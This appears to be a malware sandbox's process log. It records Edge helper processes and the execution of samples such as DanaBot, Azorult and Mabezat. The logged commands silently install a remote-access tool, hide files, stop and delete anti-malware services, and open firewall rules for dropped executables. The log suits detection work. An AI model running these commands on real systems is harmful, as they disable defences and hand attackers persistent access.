"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6560,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6712,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6892,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6672,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4408,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=4448,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6880,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=6692,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7120,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6152 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=704 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=6500,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5192 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5428,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7408 /prefetch:8

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@5768

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@1324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1324 -ip 1324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5768 -ip 5768

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 472

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 484

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7576,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4184 -ip 4184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5144 -ip 5144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7568,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=5140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7124,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7928 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7620,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:8

C:\Users\Admin\Downloads\SpySheriff.exe

"C:\Users\Admin\Downloads\SpySheriff.exe"

C:\Users\Admin\Downloads\SpySheriff.exe

"C:\Users\Admin\Downloads\SpySheriff.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7644,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5276,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=5556,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=7220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7116 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3008,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7052 /prefetch:8

C:\Users\Admin\Downloads\Azorult.exe

"C:\Users\Admin\Downloads\Azorult.exe"

C:\Users\Admin\Downloads\Azorult.exe

"C:\Users\Admin\Downloads\Azorult.exe"

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

C:\programdata\install\ink.exe

C:\programdata\install\ink.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\programdata\microsoft\intel\P.exe

C:\programdata\microsoft\intel\P.exe

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7968,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5652 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete "windows node"

C:\Windows\SysWOW64\sc.exe

sc delete "windows node"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer

C:\Windows\SysWOW64\sc.exe

sc stop Adobeflashplayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MoonTitle

C:\Windows\SysWOW64\sc.exe

sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\sc.exe

sc stop MoonTitle

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MoonTitle"

C:\Windows\SysWOW64\sc.exe

sc delete MoonTitle"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop AudioServer

C:\Windows\SysWOW64\sc.exe

sc stop AudioServer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AudioServer"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5292,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:1

C:\Windows\SysWOW64\sc.exe

sc delete AudioServer"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=2720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5452,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7068 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8052,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\sc.exe

sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\Windows\SysWOW64\sc.exe

sc delete clr_optimization_v4.0.30318_64"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql

C:\Windows\SysWOW64\sc.exe

sc stop MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete MicrosoftMysql

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Users\Admin\Downloads\Mabezat.exe

"C:\Users\Admin\Downloads\Mabezat.exe"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Users\Admin\Downloads\Mabezat.exe

"C:\Users\Admin\Downloads\Mabezat.exe"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

